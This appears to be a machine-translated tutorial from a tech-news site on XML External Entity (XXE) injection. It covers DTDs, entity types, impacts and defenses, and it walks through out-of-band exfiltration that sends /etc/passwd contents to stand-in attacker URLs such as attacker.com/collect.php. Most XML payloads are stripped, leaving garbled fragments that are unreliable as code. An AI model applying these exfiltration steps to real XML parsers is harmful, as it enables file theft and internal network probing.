Shulou(Shulou.com)06/01 Report--

This article mainly explains "what are the basic concepts and ways of using XXE". Interested friends may wish to have a look. The method introduced in this paper is simple, fast and practical. Let the editor take you to learn "what are the basic concepts and ways of using XXE"?

The basic concept and Utilization of XXE

This paper focuses on the summary of the principles and concepts of XXE, simplifying the details. In this paper, some representative contents are selected from black hat EU 2013 XML Out-Of-Band Data Retrieval, Out-of-band XML External Entity (OOB-XXE) and other high-quality articles for translation. Keep the terminology as concise as possible on the premise of ensuring the accuracy of the terminology.

0x00 references

What is a XML external entity (XXE) attack

Out-of-band XML external entity (OOB-XXE)

XML Out-Of-Band Data Retrieval

XML external entity processing

A4:2017-XML External Entities (XXE)

0x01 Overview XXE

The full name of XXE is XML External Entity Injection, that is, XML external entity injection.

It is an attack on applications that parse XML input. This attack occurs when an improperly configured XML processor processes XML input that contains references to external entities.

The role of XML

XML is designed to transfer and store data, focusing on the content of the data. XML is designed to transmit information. To interpret XML data, the application needs a XML parser.

XML documents can be of a specific type. You can declare this type in the document by specifying the type definition. The XML parser verifies that the XML document conforms to this type definition before processing the document. You can use two types of type definitions: XML schema definition (XSD) or document type definition (DTD). The XXE vulnerability occurs in the document Type definition.

What is DTD (document type definition)

The role of DTD (document type definition) is to define a legitimate building block for XML documents. DTD's declaration: the part of an XML document that declares the DTD or DTD source of the document, can be included within the XML document that uses it, or can exist as a separate DTD document (* .dtd) document.

Therefore, DTD generally believes that there are two ways to quote or declare:

1. Internal DTD: that is, the DTD of the elements, attributes, and entities in the XML document are all declared in the XML document.

2. External DTD: that is, the DTD of the elements, attributes, and entities in the XML document are declared in a separate DTD file (.dtd).

There are three forms of DTD documents:

Internal DTD type:

External DTD type:

Combination of internal and external DTD documents:

The internal DTD type is most commonly used in XXE.

Within DTD, we can declare external entities.

What is a XML entity (ENTITY)

Entities are variables that define shortcuts that reference plain text or special characters.

XML entities can come from almost anywhere-including external resources (hence the name XML external entities).

The entity types in DTD are generally divided into internal entities and external entities, and subdivided into ordinary entities and parametric entities.

Specific classification of entities

Predefined: & amp<&#37

Internal entity:

External entities:

Internal entities and external entities are collectively referred to as ordinary entities

The reference method of ordinary entity is & ordinary entity name

Parameter entity:

Parameter entities are referenced by% entity name

Normal entities and parameter entities may be:

Internal (defined in the current DTD)

External (defined in external resources)

Risk factors that may cause XXE

The application parses XML documents

The system identifier section of the entity, the document type declaration (DTD) allows the use of contaminated data

The XML parser is configured to validate and process DTD

The XML parser is configured to parse external entities within the DTD

The influence of XXE

Local file reading

Private network access

Host scan / Port scan

Remote code execution (rarely used)

Denial of service attack

Defense

Use simple data formats (such as JSON) as much as possible and avoid serialization of sensitive data.

Patch or upgrade XML processors and libraries. Use the dependency inspector.

Disable XML external entities and DTD processing in all XML parsers in the application.

Use whitelist input on the server to validate, filter, or clean up to prevent malicious data in XML documents, headers, and nodes.

The XML or XSL file upload feature uses XSD (XML Schema definition) to validate incoming XML.

SAST detects the XXE in the source code according to.

Use virtual patches, API security gateways, or Web Application Firewall (WAF) to detect and block XXE attacks.

Local file reading using 0x02 mode

When the user's input is echoed in the response, this XXE is called an error-based XXE.

Attackers can use XML entities. This is because you do not have to define XML entities in the XML document. In fact, XML entities can come from almost anywhere-including external resources (hence the name XML external entities). This is why XXE becomes a type of server-side request forgery (SSRF) attack.

An attacker can use URI (called a system identifier in XML) to create the following request. If the XML parser is configured to handle external entities (by default, many XML parsers are configured to handle external entities), the Web server returns files on the system that may contain sensitive data.

] > & ampxxe;&xxe;&xxe

Of course, attackers are not limited to getting system files. They can easily steal other local files, including source code, if they know the path and structure of the Web application. With some XML parsers, you can even get directory lists and the contents of local resources. XML external entity attacks can even allow attackers to make regular HTTP requests to files on the local network (that is, they can only be accessed from behind the firewall).

] > & ampxxe

However, this method will be limited in practical application.

XXE can only be used to get a properly formatted XML file or response

XXE cannot be used to get binaries

The obtained file must have sufficient permissions

Failure to get very large files, such as / dev/random and / dev/zero, can lead to a denial of service attack.

Solutions to the limitations of XML

CDATA (character data)

Access text files with XML special characters (such as &,)

The XML parser ignores special XML characters in CDATA (character data) tags.

"> all

The attack takes place as follows:

The XML parser first processes the% file parameter entity, which loads the file / etc / passwd.

Next, the XML parser makes a request to the attacker's DTD file located in http://attack.com/evil.dtd.

After the XML parser processes the attacker's DTD file, the% all parameter entity creates a generic entity called send, which contains a URL. The URL contains the contents of the file (for example, http://attacker.com/collect.php?collect=root:!:0:0::/:/usr/bin/ksh).

Finally, after constructing the URL, the XML parser will process the & send entity, which will make a request to the attacker's server.

Attackers can log requests at their terminals and rebuild files from log entries.

Second, data extraction through FTP

3. DNS query

XXE Attacks-Part 2: XML DTD related Attacks

Conclusion

In-band and out-of-band XML external entity injection (XXE) vulnerabilities are so severe that almost all Web applications that parse XML documents are affected. XXE can be used to cause a denial of service and to steal system files and source code from a local server. Attackers can also use XXE to launch server-side request forgery (SSRF) attacks against other servers on the internal network.

XML Dos attack

Define an entity, recursive reference.

] >

Or define a large entity and reference it multiple times.

If it is a Unix system, you can reference an external entity in DTD and read it with the file protocol

/ dev/random

Files.

] > & ampxxe

This attack overloads the memory of the XML parser. Some XML parsers automatically limit the amount of memory they can use.

Remote code execution

RCE can be implemented in php applications through XXE, but this is very rare. This is only possible if the target system loads the Expect module of php (disabled by default). In addition, php7 does not support expect modules.

XXE is easier to use in php applications. Because php provides many URL processing methods, stream decorators and data filters, this increases the attack surface.

By default, php supports external entities.

At this point, I believe you have a deeper understanding of "what is the basic concept and use of XXE". You might as well do it in practice. Here is the website, more related content can enter the relevant channels to inquire, follow us, continue to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.